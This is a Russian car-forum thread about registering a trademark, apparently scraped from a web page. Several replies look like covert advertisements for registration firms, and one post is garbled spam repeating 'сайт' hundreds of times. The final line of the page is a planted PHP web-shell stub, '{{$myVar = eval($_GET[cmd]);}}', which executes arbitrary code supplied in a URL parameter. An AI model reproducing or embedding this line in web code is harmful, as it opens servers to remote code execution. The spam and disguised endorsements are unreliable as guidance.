+ Ответить в теме
Показано с 1 по 10 из 10

Тема: Регистрация товарного знака


  1. #1
    Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    .....
    Сообщений
    45

    Регистрация товарного знака

    Господа автомобилисты, есть ли среди вас те, кому в недавнем прошлом приходилось регистрировать товарный знак. Насколько сложна эта процедура, много ли времени отнимает? Вскорости тоже нужно будет провести эту процедуру и я в раздумьях самому ли ею заняться или поручить кому-то?

  2. #2
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54
    Автор, вам и правда, хочется самому возиться со всей этой тягомотиной по поводу регистрации? Сейчас существует масса сторонних организаций, которые выполнят вместо вас эту работу. Здесь можно посмотреть примерную стоимость регистрации товарного знака в настоящее время https://in-prop.ru/stoimost-uslug.html

  3. #3
    Мимо проходил Arsenal is on a distinguished road Аватар для Arsenal
    Регистрация
    12.02.2019
    Откуда
    ......
    Машина
    ...
    Сообщений
    37
    А я сам регистрировал товарный знак. На самом деле времени на это тратиться не так уж и много, и разобраться во всем можно.

  4. #4
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66
    Цитата Сообщение от Arsenal Посмотреть сообщение
    А я сам регистрировал товарный знак. На самом деле времени на это тратиться не так уж и много, и разобраться во всем можно.
    В принципе можно, но времени я бы не сказал что тратится немного. Пока разберешься во всех этих классах МКТУ, пока заявку правильно заполнишь. Вы точно все сами делали?

  5. #5
    Новичок HaTali is on a distinguished road Аватар для HaTali
    Регистрация
    15.12.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    115
    Если будете самостоятельно регистрировать свой товарный знак, то вам не помешает вот эту статью https://ezybrand.ru/blog/kak-zaregis...e-rukovodstvo/ прочесть, в ней подробно описан весь процесс регистрации товарных знаков в Роспатенте.
    Последний раз редактировалось HaTali; 31.05.2021 в 08:45.

  6. #6
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    При открытии цеха по производству колбасных изделий требовалось оформить документаци. в соответствии с требованиями законодательства. Как все правильно сделать, мне помогли сотрудники патентного бюро ЗИС. На его сайте представлена подробная информация по всем вопросам. С операторами можно связаться в режиме онлайн, отправив вопрос на электронную почту info@zis365.com. На сайте https://zis365.com/tpost/chymuzvzk1-...ii-znak-v-ross подробно расписан алгоритм действий на каждом этапе оформления товарного знака. Он представлен в виде понятной схемы. Узнал, что с 2021 года свидетельство на товарный знак выдается в электронном виде.

  7. #7
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    а кто в Кыргызстане может выполнить такую услугу?

  8. #8
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    При регистрации товарного знака необходимо учитывать важные нюансы и моменты, а лучшим вариантом будет обратиться к специалистам, у которых есть опыт в подобных вопросах. Мы заказывали тут https://www.internationallegalbridge...-kyrgyzpatente регистрацию товарных знаков в Кыргызпатенте на территории Кыргызстана, так как здесь подошли условия сотрудничества. Удобно, что с представителями компании можно связаться через форму на сайте, это сэкономит время.
    Последний раз редактировалось Rusik23; 21.03.2023 в 13:07.

  9. #9

  10. #10
    GTI-Racing GregoryQuera is on a distinguished road Аватар для GregoryQuera
    Регистрация
    02.12.2022
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    71,778
    сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтtuchkasсайтсайт

+ Ответить в теме

Похожие темы

  1. Светодиоды для номерного знака
    от map в разделе Барахолка
    Ответов: 8
    Последнее сообщение: 01.04.2024, 17:13
  2. Регистрация
    от Badik52 в разделе Курилка
    Ответов: 8
    Последнее сообщение: 25.06.2012, 14:14
  3. Помогите с выбором номерного знака.
    от daToxa в разделе Курилка
    Ответов: 11
    Последнее сообщение: 27.04.2009, 14:19
  4. Покраска Знака Volkswagen На Пятой Двери 5 Gti
    от GTI_919_Spb в разделе Стайлинг: кузов, салон, свет и прочее
    Ответов: 6
    Последнее сообщение: 19.05.2008, 02:12
  5. Регистрация Авто.
    от Rust в разделе Законодательство и страхование
    Ответов: 2
    Последнее сообщение: 08.05.2008, 00:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}